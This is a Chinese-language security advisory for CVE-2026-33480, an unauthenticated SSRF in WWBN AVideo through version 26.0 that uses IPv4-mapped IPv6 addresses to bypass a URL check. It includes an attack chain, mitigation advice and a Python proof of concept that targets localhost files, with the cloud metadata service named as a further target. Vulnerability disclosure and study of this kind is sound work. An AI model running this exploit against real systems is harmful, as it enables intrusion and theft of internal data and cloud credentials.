IPBUF安全漏洞报告
English
CVE-2026-33480 CVSS 8.6 高危

CVE-2026-33480 AVideo SSRF漏洞

披露日期: 2026-03-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33480
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
8.6 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

SSRFAVideoIPv6 BypassInformation DisclosureCWE-918

漏洞概述

WWBN AVideo 是一个开源视频平台。在 26.0 及之前版本中,存在一个服务端请求伪造(SSRF)漏洞。攻击者可以利用 IPv4 映射的 IPv6 地址绕过 `isSSRFSafeURL()` 函数的安全检查。未授权的 `plugin/LiveLinks/proxy.php` 端点在获取 URL 前使用了该函数进行验证,但由于 IPv6 前缀通过了所有检查,攻击者可借此访问云元数据服务、内部网络及本地主机服务。

技术细节

该漏洞的核心在于 AVideo 中的 `isSSRFSafeURL()` 函数未能正确处理 IPv4 映射的 IPv6 地址格式。虽然该函数旨在防止 SSRF 攻击,但攻击者可以通过构造形如 `::ffff:127.0.0.1`(指向 localhost)或 `::ffff:169.254.169.254`(指向云元数据服务)的 URL 绕过验证机制。受影响的端点是 `plugin/LiveLinks/proxy.php`,它不需要身份验证即可访问。当服务器使用 cURL 请求这些经过特殊构造的 URL 时,会将其解析为内部地址,从而导致信息泄露或进一步的内部网络渗透。官方已在特定提交中修复了此问题。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用的是 WWBN AVideo 平台,且版本受影响(<= 26.0)。
STEP 2
利用漏洞
攻击者构造包含 IPv4 映射 IPv6 地址(如 ::ffff:127.0.0.1)的恶意 URL。
STEP 3
绕过检测
将恶意 URL 发送至未授权的 `plugin/LiveLinks/proxy.php` 端点,`isSSRFSafeURL` 函数未能识别该地址为内网地址,验证通过。
STEP 4
执行攻击
服务器端通过 cURL 请求该 URL,获取本地服务或云元数据信息。
STEP 5
数据泄露
服务器将获取到的敏感信息返回给攻击者,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable AVideo instance # Replace 'example.com' with the actual target host target_url = "http://example.com/plugin/LiveLinks/proxy.php" # Payload using IPv4-mapped IPv6 address to bypass SSRF checks # This attempts to access the localhost (127.0.0.1) of the server # Change the IP to scan internal networks (e.g., 192.168.1.1) bypass_payload = "http://[::ffff:127.0.0.1]/etc/passwd" params = { "url": bypass_payload } try: print(f"[*] Sending request to: {target_url}") print(f"[*] Payload: {bypass_payload}") response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] Exploit successful! SSRF bypassed.") print("[+] Response content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用 LiveLinks 插件或通过防火墙规则阻断对 `proxy.php` 文件的外部访问。同时,检查服务器日志,确认是否已有针对内部网络(如 127.0.0.1 或 169.254.169.254)的异常请求记录。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表